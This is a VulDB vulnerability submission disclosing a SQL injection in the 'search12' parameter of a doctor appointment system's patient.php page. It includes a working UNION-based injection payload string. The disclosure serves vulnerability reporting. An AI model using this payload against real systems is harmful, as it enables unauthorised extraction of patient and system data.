| Title | Sql injection exists for search12 parameter of edoc doctor appointment system |
|---|
| Description | There is a SQL injection vulnerability in the directory xxx. The specific parameter is "search12". Because there is no restriction and filtering on user input, some malicious users can attack by constructing illegal parameters, which will lead to the acquisition of important system information by the attacker.
Payload:search12=Test Patient' UNION ALL SELECT CONCAT(0x71707a7a71,0x65704d614147646e5542796a494f4e4a62416b666e415a6e4b6e4a424d72707975554261756d5667,0x7170717a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL---&search=Search |
|---|
| Source | ⚠️ https://github.com/E1CHO/cve_hub/blob/main/edoc%20doctor%20appointment%20system/edoc%20docker%20search.pdf |
|---|
| User | SSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (UID 38936) |
|---|
| Submission | 02/27/2023 08:53 (3 years ago) |
|---|
| Moderation | 02/27/2023 12:07 (3 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 221821 [SourceCodester Doctors Appointment System 1.0 /edoc/doctor/patient.php search12 sql injection] |
|---|
| Points | 20 |
|---|